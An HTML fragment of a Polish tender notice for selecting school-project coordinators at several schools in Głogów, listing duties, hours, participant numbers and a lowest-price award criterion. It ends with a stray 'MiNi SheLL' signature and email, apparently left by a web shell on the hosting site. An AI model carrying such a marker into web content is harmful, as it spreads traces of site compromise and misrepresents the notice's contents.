<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje koordynowanie prac związanych z realizacją programu rozwojowego szkoły w zakresie:
ZADANIA OGÓLNE W SZCZEGÓLNOŚCI:
-udział w szkoleniu z zakresu równości szans kobiet i mężczyzn w projekcie,
-udział w spotkaniach zespołu projektowego,
-obsługa kontroli, 
-utrzymywanie stałej współpracy z biurem projektu, 
-zgłaszanie wszelkich nieprawidłowości podczas realizacji projektu do biura projektu,
-wykonywanie innych obowiązków wynikających bezpośrednio z projektu i z obowiązków nałożonych przez Instytucję Pośredniczącą,
-promowanie projektu, informowanie społeczności lokalnej o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, 
-oznaczanie wszelkiej wytwarzanej dokumentacji zgodnie z zasadami promocji POKL, 
-przyjęcie dostaw materiałów biurowych na potrzeby zarządzania projektem i ich rozdysponowanie,
-prowadzenie niezbędnej dokumentacji projektu zgodnie z przekazanymi wzorami dokumentów przez biuro projektu,
-przechowywanie wszelkiej wytworzonej dokumentacji projektowej w okresie wskazanym przez biuro projektu,  
-najpóźniej w ostatnim dniu trwania umowy zlecenie przekazanie pełnej dokumentacji projektowej  dyrektorowi szkoły,
-inne zadania nie przewidziane wyżej
ZADANIA ZWIĄZANE Z ZAKUPEM POMOCY DYDAKTYCZNYCH, W TYM ELEMENTÓW PAKIETÓW SZKOLENIOWYCH W SZCZEGÓLNOŚCI:
-dokonanie opisu przedmiotu zamówienia do przetargów na zakupu pomocy dydaktycznych: podręczników i innych wydawnictw, materiałów biurowych, programów komputerowych, i innych określonych w pakietach szkoleniowych, 
-sprawdzanie ofert pod kątem zgodności wykazanego towaru z założeniami projektu,
-odbiór i sprawdzenie pod względem ilościowym i jakościowym  dostarczanych pomocy dydaktycznych oraz materiałów biurowych zakupionych w ramach projektu,
-oznaczanie naklejkami z logo POKL, EFS zakupionych pomocy dydaktycznych,
-wprowadzenie na stan szkoły zakupionych pomocy dydaktycznych,
-kompletowanie pakietów szkoleniowych dla ucznia i dla trenera,
-przygotowanie i rozdanie pakietów dla uczniów i nauczycieli za potwierdzeniem odbioru,
-na koniec każdej edycji zajęć dodatkowych odebranie od trenerów i uczestników projektu przekazanych pomocy dydaktycznych stanowiących majątek szkoły,
-inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z REALIZACJĄ PROGRAMÓW ROZWOJOWYCH SZKOŁY W ZAKRESIE REALIZACJI ZAJĘĆ DODATKOWYCH W SZCZEGÓLNOŚCI::
-zapewnienie przez okres trwania zajęć bazy dydaktycznej (dostępność sal lekcyjnych, sprawność sprzętu, pomoce dydaktyczne, materiały itp.) do prowadzenia zajęć dodatkowych, 
-zorganizowanie zajęć dodatkowych zgodnie z  programem rozwojowym szkoły w zakresie rozwoju kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego ujętych projekcie, 
-dbałość o zapewnienie właściwej realizacji projektu w części dotyczącej realizacji programów rozwojowych w szkołach i placówkach, zgodnej z wnioskiem o dofinansowanie oraz prawodawstwem polskim i unijnym,
-oznaczenie szkoły plakatami projektu w szczególności sal lekcyjnych, w których będą prowadzone zajęcia
-inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z ZATRUDNIANIEM I NADZOREM NAD ZATRUDNIONYMI TRENERAMI W SZCZEGÓLNOŚCI:
-dokonanie opisu przedmiotu zamówienia do przetargu dotyczącego zatrudniania trenerów do prowadzenia zajęć z zakresu kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego,
-sprawdzanie ofert w zakresie posiadanych kwalifikacji zawodowych trenerów,
-przeszkolenie zatrudnionych trenerów z zakresu równości szans kobiet i mężczyzn w projekcie, 
-przygotowanie pakietu dokumentów dla zatrudnionych trenerów na potrzeby prowadzenia zajęć (dziennik zajęć, druki: listy obecności, wywiady dla uczniów, dokumenty rozliczeniowej. protokół odbioru, sprawozdanie, rachunek), 
-opracowywanie miesięcznych zbiorczych harmonogramów zajęć w odniesieniu do swojej szkoły i ich przekazanie do biura projektu,
-bieżące gromadzenie dokumentów rozliczeniowych od trenerów i przekazanie do biura projektu,
-monitorowanie prowadzenia zajęć dodatkowych przez trenerów pod kątem zgodności z przesłanym harmonogramem do IP,  w szczególności liczby realizowanych godzin zajęć, 
-potwierdzanie liczby zrealizowanych godzin zajęć przez każdego trenera w danym miesiącu,
-zgłaszanie na bieżąco wszelkich zmian w harmonogramie zajęć do biura projektu,
-sprawdzenie dokumentacji przekazanej przez trenerów po każdej edycji zajęć tj. dzienników zajęć, list obecności, wywiadów z uczniami poda kątem poprawności wypełniania oraz zgodności z zapisami projektu
-inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z  UDZIAŁEM  UCZESTNIKÓW PROJEKTU W SZCZEGÓLNOŚCI:
-rozpowszechnieni informacji w szkole wśród uczniów o prowadzonym naborze do projektu pn. Moja przyszłość w moich rękach za pomocą strony internetowej szkoły, tablicy ogłoszeń itp.
-prowadzenie procesu rekrutacji  i naboru grupy docelowej uczestników projektu (gromadzenie dokumentów zgłoszeniowych, układanie list przyjętych, wywieszenie list przyjętych, złożenie sprawozdania z rekrutacji do biura projektu, zawarcie umów z pełnoletnimi uczestnikami lub ich opiekunami prawnymi),
-zgromadzenie formularzy i wprowadzenie do bazy PEFS danych uczestników projektu,
-poinformowanie uczestników projektu, że ich udział w  projekcie pn. Moja przyszłość w moich rekach jest bezpłatny, a wszystkie prowadzone działania w projekcie są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
-przeprowadzenie badania ankietowego uczestników projektu na wejście do projektu i na zakończenie udziału w projekcie w każdej edycji zajęć,
-opracowanie analizy każdego badania ewaluacyjnego oraz podsumowania obejmującego dwie edycje
-bieżące monitorowanie udziału uczestników projektu w zajęciach dodatkowych,
-inne zadania nie przewidziane wyżej,
UWAGA: Zaangażowanie tygodniowe lidera szkolnego ustala się na nie mniej niż 8 godzin pracy na tydzień w miesiącach: wrzesień - czerwiec oraz na nie mniej niż 4 godziny pracy na tydzień  w miesiącach: lipiec, sierpień.

Planowana liczba godzina zajęć dodatkowych realizowanych w ramach programu rozwojowego w latach szkolnych 2012-2013 i 2013-2014 wynosi - 2833, planowana liczba uczestników projektu wynosi - 320 uczniów-uczennic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wybór lidera szkolnego w Zespole Szkół z Oddziałami Integracyjnymi w Głogowie, przy ul. Perseusza 5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje koordynowanie prac związanych z realizacją programu rozwojowego szkoły w zakresie:
ZADANIA OGÓLNE W SZCZEGÓLNOŚCI:
-udział w szkoleniu z zakresu równości szans kobiet i mężczyzn w projekcie,
-	udział w spotkaniach zespołu projektowego,
-	obsługa kontroli, 
-	utrzymywanie stałej współpracy z biurem projektu, 
-	zgłaszanie wszelkich nieprawidłowości podczas realizacji projektu do biura projektu,
-	wykonywanie innych obowiązków wynikających bezpośrednio z projektu i z obowiązków nałożonych przez Instytucję Pośredniczącą,
-	promowanie projektu, informowanie społeczności lokalnej o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, 
-	oznaczanie wszelkiej wytwarzanej dokumentacji zgodnie z zasadami promocji POKL, 
-	przyjęcie dostaw materiałów biurowych na potrzeby zarządzania projektem i ich rozdysponowanie,
-	prowadzenie niezbędnej dokumentacji projektu zgodnie z przekazanymi wzorami dokumentów przez biuro projektu,
-	przechowywanie wszelkiej wytworzonej dokumentacji projektowej w okresie wskazanym przez biuro projektu,  
-	najpóźniej w ostatnim dniu trwania umowy zlecenie przekazanie pełnej dokumentacji projektowej  dyrektorowi szkoły,
-	inne zadania nie przewidziane wyżej
ZADANIA ZWIĄZANE Z ZAKUPEM POMOCY DYDAKTYCZNYCH, W TYM ELEMNTÓW PAKIETÓW SZKOLENIOWYCH W SZCZEGÓLNOŚCI:
-	dokonanie opisu przedmiotu zamówienia do przetargów na zakupu pomocy dydaktycznych: podręczników i innych wydawnictw, materiałów biurowych, programów komputerowych, 
i innych określonych w pakietach szkoleniowych, 
-	sprawdzanie ofert pod kątem zgodności wykazanego towaru z założeniami projektu,
-	odbiór i sprawdzenie pod względem ilościowym i jakościowym  dostarczanych pomocy dydaktycznych oraz materiałów biurowych zakupionych w ramach projektu,
-	oznaczanie naklejkami z logo POKL, EFS zakupionych pomocy dydaktycznych,
-	wprowadzenie na stan szkoły zakupionych pomocy dydaktycznych,
-	kompletowanie pakietów szkoleniowych dla ucznia i dla trenera,
-	przygotowanie i rozdanie pakietów dla uczniów i nauczycieli za potwierdzeniem odbioru,
-	na koniec każdej edycji zajęć dodatkowych odebranie od trenerów i uczestników projektu przekazanych pomocy dydaktycznych stanowiących majątek szkoły,
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z REALIZACJĄ PROGRAMÓW ROZWOJOWYCH SZKOŁY W ZAKRESIE REALIZACJI ZAJĘĆ DODATKOWYCH W SZCZEGÓLNOŚCI::
-	zapewnienie przez okres trwania zajęć bazy dydaktycznej (dostępność sal lekcyjnych, sprawność sprzętu, pomoce dydaktyczne, materiały itp.) do prowadzenia zajęć dodatkowych, 
-	zorganizowanie zajęć dodatkowych zgodnie z  programem rozwojowym szkoły w zakresie rozwoju kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego ujętych projekcie, 
-	dbałość o zapewnienie właściwej realizacji projektu w części dotyczącej realizacji programów rozwojowych w szkołach i placówkach, zgodnej z wnioskiem o dofinansowanie oraz prawodawstwem polskim i unijnym,
-	oznaczenie szkoły plakatami projektu w szczególności sal lekcyjnych, w których będą prowadzone zajęcia
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z ZATRUDNIANIEM I NADZOREM NAD ZATRUDNIONYMI TRENERAMI W SZCZEGÓLNOŚCI:
-	dokonanie opisu przedmiotu zamówienia do przetargu dotyczącego zatrudniania trenerów do prowadzenia zajęć z zakresu kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego,
-	sprawdzanie ofert w zakresie posiadanych kwalifikacji zawodowych trenerów,
-	przeszkolenie zatrudnionych trenerów z zakresu równości szans kobiet i mężczyzn w projekcie, 
-	przygotowanie pakietu dokumentów dla zatrudnionych trenerów na potrzeby prowadzenia zajęć (dziennik zajęć, druki: listy obecności, wywiady dla uczniów, dokumenty rozliczeniowej. protokół odbioru, sprawozdanie, rachunek), 
-	opracowywanie miesięcznych zbiorczych harmonogramów zajęć w odniesieniu do swojej szkoły i ich przekazanie do biura projektu,
-	bieżące gromadzenie dokumentów rozliczeniowych od trenerów i przekazanie do biura projektu,
-	monitorowanie prowadzenia zajęć dodatkowych przez trenerów pod kątem zgodności 
z przesłanym harmonogramem do IP,  w szczególności liczby realizowanych godzin zajęć, 
-	potwierdzanie liczby zrealizowanych godzin zajęć przez każdego trenera w danym miesiącu,
-	zgłaszanie na bieżąco wszelkich zmian w harmonogramie zajęć do biura projektu,
-	sprawdzenie dokumentacji przekazanej przez trenerów po każdej edycji zajęć tj. dzienników zajęć, list obecności, wywiadów z uczniami poda kątem poprawności wypełniania oraz zgodności z zapisami projektu
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z  UDZIAŁEM  UCZESTNIKÓW PROJKETU W SZCZEGÓLNOŚCI:
-	rozpowszechnieni informacji w szkole wśród uczniów o prowadzonym naborze do projektu pn. Moja przyszłość w moich rękach za pomocą strony internetowej szkoły, tablicy ogłoszeń itp.
-	prowadzenie procesu rekrutacji  i naboru grupy docelowej uczestników projektu (gromadzenie dokumentów zgłoszeniowych, układanie list przyjętych, wywieszenie list przyjętych, złożenie sprawozdania z rekrutacji do biura projektu, zawarcie umów z pełnoletnimi uczestnikami lub ich opiekunami prawnymi),
-	zgromadzenie formularzy i wprowadzenie do bazy PEFS danych uczestników projektu,
-	poinformowanie uczestników projektu, że ich udział w  projekcie pn. Moja przyszłość 
w moich rekach jest bezpłatny, a wszystkie prowadzone działania w projekcie są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
-	przeprowadzenie badania ankietowego uczestników projektu na wejście do projektu i na zakończenie udziału w projekcie w każdej edycji zajęć,
-	opracowanie analizy każdego badania ewaluacyjnego oraz podsumowania obejmującego dwie edycje
-	bieżące monitorowanie udziału uczestników projektu w zajęciach dodatkowych,
-	inne zadania nie przewidziane wyżej,

UWAGA: Zaangażowanie tygodniowe lidera szkolnego ustala się na nie mniej niż 5 godzin pracy na tydzień w miesiącach: wrzesień - czerwiec oraz na nie mniej niż 2,5 godziny pracy na tydzień w miesiącach: lipiec, sierpień.

Planowana liczba godzina zajęć dodatkowych realizowanych w ramach programu rozwojowego w latach szkolnych 2012-2013 i 2013-2014 wynosi - 774, planowana liczba uczestników projektu wynosi - 48 uczniów-uczennic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wybór lidera szkolnego w Zespole Szkół im. J. Wyżykowskiego w Głogowie, przy ul. Wita Stwosza 3a..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje koordynowanie prac związanych z realizacją programu rozwojowego szkoły w zakresie:
ZADANIA OGÓLNE W SZCZEGÓLNOŚCI:
-	udział w szkoleniu z zakresu równości szans kobiet i mężczyzn w projekcie,
-	udział w spotkaniach zespołu projektowego,
-	obsługa kontroli, 
-	utrzymywanie stałej współpracy z biurem projektu, 
-	zgłaszanie wszelkich nieprawidłowości podczas realizacji projektu do biura projektu,
-	wykonywanie innych obowiązków wynikających bezpośrednio z projektu i z obowiązków nałożonych przez Instytucję Pośredniczącą,
-	promowanie projektu, informowanie społeczności lokalnej o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, 
-	oznaczanie wszelkiej wytwarzanej dokumentacji zgodnie z zasadami promocji POKL, 
-	przyjęcie dostaw materiałów biurowych na potrzeby zarządzania projektem i ich rozdysponowanie,
-	prowadzenie niezbędnej dokumentacji projektu zgodnie z przekazanymi wzorami dokumentów przez biuro projektu,
-	przechowywanie wszelkiej wytworzonej dokumentacji projektowej w okresie wskazanym przez biuro projektu,  
-	najpóźniej w ostatnim dniu trwania umowy zlecenie przekazanie pełnej dokumentacji projektowej  dyrektorowi szkoły,
-	inne zadania nie przewidziane wyżej
ZADANIA ZWIĄZANE Z ZAKUPEM POMOCY DYDAKTYCZNYCH, W TYM ELEMNTÓW PAKIETÓW SZKOLENIOWYCH W SZCZEGÓLNOŚCI:
-	dokonanie opisu przedmiotu zamówienia do przetargów na zakupu pomocy dydaktycznych: podręczników i innych wydawnictw, materiałów biurowych, programów komputerowych, 
i innych określonych w pakietach szkoleniowych, 
-	sprawdzanie ofert pod kątem zgodności wykazanego towaru z założeniami projektu,
-	odbiór i sprawdzenie pod względem ilościowym i jakościowym  dostarczanych pomocy dydaktycznych oraz materiałów biurowych zakupionych w ramach projektu,
-	oznaczanie naklejkami z logo POKL, EFS zakupionych pomocy dydaktycznych,
-	wprowadzenie na stan szkoły zakupionych pomocy dydaktycznych,
-	kompletowanie pakietów szkoleniowych dla ucznia i dla trenera,
-	przygotowanie i rozdanie pakietów dla uczniów i nauczycieli za potwierdzeniem odbioru,
-	na koniec każdej edycji zajęć dodatkowych odebranie od trenerów i uczestników projektu przekazanych pomocy dydaktycznych stanowiących majątek szkoły,
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z REALIZACJĄ PROGRAMÓW ROZWOJOWYCH SZKOŁY W ZAKRESIE REALIZACJI ZAJĘĆ DODATKOWYCH W SZCZEGÓLNOŚCI::
-	zapewnienie przez okres trwania zajęć bazy dydaktycznej (dostępność sal lekcyjnych, sprawność sprzętu, pomoce dydaktyczne, materiały itp.) do prowadzenia zajęć dodatkowych, 
-	zorganizowanie zajęć dodatkowych zgodnie z  programem rozwojowym szkoły w zakresie rozwoju kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego ujętych projekcie, 
-	dbałość o zapewnienie właściwej realizacji projektu w części dotyczącej realizacji programów rozwojowych w szkołach i placówkach, zgodnej z wnioskiem o dofinansowanie oraz prawodawstwem polskim i unijnym,
-	oznaczenie szkoły plakatami projektu w szczególności sal lekcyjnych, w których będą prowadzone zajęcia
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z ZATRUDNIANIEM I NADZOREM NAD ZATRUDNIONYMI TRENERAMI W SZCZEGÓLNOŚCI:
-	dokonanie opisu przedmiotu zamówienia do przetargu dotyczącego zatrudniania trenerów do prowadzenia zajęć z zakresu kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego,
-	sprawdzanie ofert w zakresie posiadanych kwalifikacji zawodowych trenerów,
-	przeszkolenie zatrudnionych trenerów z zakresu równości szans kobiet i mężczyzn w projekcie, 
-	przygotowanie pakietu dokumentów dla zatrudnionych trenerów na potrzeby prowadzenia zajęć (dziennik zajęć, druki: listy obecności, wywiady dla uczniów, dokumenty rozliczeniowej. protokół odbioru, sprawozdanie, rachunek), 
-	opracowywanie miesięcznych zbiorczych harmonogramów zajęć w odniesieniu do swojej szkoły i ich przekazanie do biura projektu,
-	bieżące gromadzenie dokumentów rozliczeniowych od trenerów i przekazanie do biura projektu,
-	monitorowanie prowadzenia zajęć dodatkowych przez trenerów pod kątem zgodności 
z przesłanym harmonogramem do IP,  w szczególności liczby realizowanych godzin zajęć, 
-	potwierdzanie liczby zrealizowanych godzin zajęć przez każdego trenera w danym miesiącu,
-	zgłaszanie na bieżąco wszelkich zmian w harmonogramie zajęć do biura projektu,
-	sprawdzenie dokumentacji przekazanej przez trenerów po każdej edycji zajęć tj. dzienników zajęć, list obecności, wywiadów z uczniami poda kątem poprawności wypełniania oraz zgodności z zapisami projektu
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z  UDZIAŁEM  UCZESTNIKÓW PROJKETU W SZCZEGÓLNOŚCI:
-	rozpowszechnieni informacji w szkole wśród uczniów o prowadzonym naborze do projektu pn. Moja przyszłość w moich rękach za pomocą strony internetowej szkoły, tablicy ogłoszeń itp.
-	prowadzenie procesu rekrutacji  i naboru grupy docelowej uczestników projektu (gromadzenie dokumentów zgłoszeniowych, układanie list przyjętych, wywieszenie list przyjętych, złożenie sprawozdania z rekrutacji do biura projektu, zawarcie umów z pełnoletnimi uczestnikami lub ich opiekunami prawnymi),
-	zgromadzenie formularzy i wprowadzenie do bazy PEFS danych uczestników projektu,
-	poinformowanie uczestników projektu, że ich udział w  projekcie pn. Moja przyszłość 
w moich rekach jest bezpłatny, a wszystkie prowadzone działania w projekcie są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
-	przeprowadzenie badania ankietowego uczestników projektu na wejście do projektu i na zakończenie udziału w projekcie w każdej edycji zajęć,
-	opracowanie analizy każdego badania ewaluacyjnego oraz podsumowania obejmującego dwie edycje
-	bieżące monitorowanie udziału uczestników projektu w zajęciach dodatkowych,
-	inne zadania nie przewidziane wyżej,

UWAGA: Zaangażowanie tygodniowe lidera szkolnego ustala się na nie mniej niż 8 godzin pracy na tydzień w miesiącach: wrzesień - czerwiec oraz na nie mniej niż 4 godziny pracy na tydzień w miesiącach: lipiec, sierpień.

Planowana liczba godzina zajęć dodatkowych realizowanych w ramach programu rozwojowego w latach szkolnych 2012-2013 i 2013-2014 wynosi - 2481, planowana liczba uczestników projektu wynosi - 182 uczniów-uczennic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wybór lidera szkolnego w Zespole Placówek Szkolno - Wychowawczych w Głogowie, przy ul. Sportowej 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje koordynowanie prac związanych z realizacją programu rozwojowego szkoły w zakresie:
ZADANIA OGÓLNE W SZCZEGÓLNOŚCI:
-	udział w szkoleniu z zakresu równości szans kobiet i mężczyzn w projekcie,
-	udział w spotkaniach zespołu projektowego,
-	obsługa kontroli, 
-	utrzymywanie stałej współpracy z biurem projektu, 
-	zgłaszanie wszelkich nieprawidłowości podczas realizacji projektu do biura projektu,
-	wykonywanie innych obowiązków wynikających bezpośrednio z projektu i z obowiązków nałożonych przez Instytucję Pośredniczącą,
-	promowanie projektu, informowanie społeczności lokalnej o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, 
-	oznaczanie wszelkiej wytwarzanej dokumentacji zgodnie z zasadami promocji POKL, 
-	przyjęcie dostaw materiałów biurowych na potrzeby zarządzania projektem i ich rozdysponowanie,
-	prowadzenie niezbędnej dokumentacji projektu zgodnie z przekazanymi wzorami dokumentów przez biuro projektu,
-	przechowywanie wszelkiej wytworzonej dokumentacji projektowej w okresie wskazanym przez biuro projektu,  
-	najpóźniej w ostatnim dniu trwania umowy zlecenie przekazanie pełnej dokumentacji projektowej  dyrektorowi szkoły,
-	inne zadania nie przewidziane wyżej
ZADANIA ZWIĄZANE Z ZAKUPEM POMOCY DYDAKTYCZNYCH, W TYM ELEMNTÓW PAKIETÓW SZKOLENIOWYCH W SZCZEGÓLNOŚCI:
-	dokonanie opisu przedmiotu zamówienia do przetargów na zakupu pomocy dydaktycznych: podręczników i innych wydawnictw, materiałów biurowych, programów komputerowych, 
i innych określonych w pakietach szkoleniowych, 
-	sprawdzanie ofert pod kątem zgodności wykazanego towaru z założeniami projektu,
-	odbiór i sprawdzenie pod względem ilościowym i jakościowym  dostarczanych pomocy dydaktycznych oraz materiałów biurowych zakupionych w ramach projektu,
-	oznaczanie naklejkami z logo POKL, EFS zakupionych pomocy dydaktycznych,
-	wprowadzenie na stan szkoły zakupionych pomocy dydaktycznych,
-	kompletowanie pakietów szkoleniowych dla ucznia i dla trenera,
-	przygotowanie i rozdanie pakietów dla uczniów i nauczycieli za potwierdzeniem odbioru,
-	na koniec każdej edycji zajęć dodatkowych odebranie od trenerów i uczestników projektu przekazanych pomocy dydaktycznych stanowiących majątek szkoły,
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z REALIZACJĄ PROGRAMÓW ROZWOJOWYCH SZKOŁY W ZAKRESIE REALIZACJI ZAJĘĆ DODATKOWYCH W SZCZEGÓLNOŚCI::
-	zapewnienie przez okres trwania zajęć bazy dydaktycznej (dostępność sal lekcyjnych, sprawność sprzętu, pomoce dydaktyczne, materiały itp.) do prowadzenia zajęć dodatkowych, 
-	zorganizowanie zajęć dodatkowych zgodnie z  programem rozwojowym szkoły w zakresie rozwoju kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego ujętych projekcie, 
-	dbałość o zapewnienie właściwej realizacji projektu w części dotyczącej realizacji programów rozwojowych w szkołach i placówkach, zgodnej z wnioskiem o dofinansowanie oraz prawodawstwem polskim i unijnym,
-	oznaczenie szkoły plakatami projektu w szczególności sal lekcyjnych, w których będą prowadzone zajęcia
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z ZATRUDNIANIEM I NADZOREM NAD ZATRUDNIONYMI TRENERAMI W SZCZEGÓLNOŚCI:
-	dokonanie opisu przedmiotu zamówienia do przetargu dotyczącego zatrudniania trenerów do prowadzenia zajęć z zakresu kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego,
-	sprawdzanie ofert w zakresie posiadanych kwalifikacji zawodowych trenerów,
-	przeszkolenie zatrudnionych trenerów z zakresu równości szans kobiet i mężczyzn w projekcie, 
-	przygotowanie pakietu dokumentów dla zatrudnionych trenerów na potrzeby prowadzenia zajęć (dziennik zajęć, druki: listy obecności, wywiady dla uczniów, dokumenty rozliczeniowej. protokół odbioru, sprawozdanie, rachunek), 
-	opracowywanie miesięcznych zbiorczych harmonogramów zajęć w odniesieniu do swojej szkoły i ich przekazanie do biura projektu,
-	bieżące gromadzenie dokumentów rozliczeniowych od trenerów i przekazanie do biura projektu,
-	monitorowanie prowadzenia zajęć dodatkowych przez trenerów pod kątem zgodności 
z przesłanym harmonogramem do IP,  w szczególności liczby realizowanych godzin zajęć, 
-	potwierdzanie liczby zrealizowanych godzin zajęć przez każdego trenera w danym miesiącu,
-	zgłaszanie na bieżąco wszelkich zmian w harmonogramie zajęć do biura projektu,
-	sprawdzenie dokumentacji przekazanej przez trenerów po każdej edycji zajęć tj. dzienników zajęć, list obecności, wywiadów z uczniami poda kątem poprawności wypełniania oraz zgodności z zapisami projektu
-	inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z  UDZIAŁEM  UCZESTNIKÓW PROJKETU W SZCZEGÓLNOŚCI:
-	rozpowszechnieni informacji w szkole wśród uczniów o prowadzonym naborze do projektu pn. Moja przyszłość w moich rękach za pomocą strony internetowej szkoły, tablicy ogłoszeń itp.
-	prowadzenie procesu rekrutacji  i naboru grupy docelowej uczestników projektu (gromadzenie dokumentów zgłoszeniowych, układanie list przyjętych, wywieszenie list przyjętych, złożenie sprawozdania z rekrutacji do biura projektu, zawarcie umów z pełnoletnimi uczestnikami lub ich opiekunami prawnymi),
-	zgromadzenie formularzy i wprowadzenie do bazy PEFS danych uczestników projektu,
-	poinformowanie uczestników projektu, że ich udział w  projekcie pn. Moja przyszłość 
w moich rekach jest bezpłatny, a wszystkie prowadzone działania w projekcie są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
-	przeprowadzenie badania ankietowego uczestników projektu na wejście do projektu i na zakończenie udziału w projekcie w każdej edycji zajęć,
-	opracowanie analizy każdego badania ewaluacyjnego oraz podsumowania obejmującego dwie edycje
-	bieżące monitorowanie udziału uczestników projektu w zajęciach dodatkowych,
-	inne zadania nie przewidziane wyżej,

UWAGA: Zaangażowanie tygodniowe lidera szkolnego ustala się na nie mniej niż 5 godzin pracy na tydzień w miesiącach: wrzesień - czerwiec oraz na nie mniej niż 2,5 godziny pracy na tydzień w miesiącach: lipiec, sierpień.

Planowana liczba godzina zajęć dodatkowych realizowanych w ramach programu rozwojowego w latach szkolnych 2012-2013 i 2013-2014 wynosi - 832, planowana liczba uczestników projektu wynosi - 64 uczniów-uczennic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com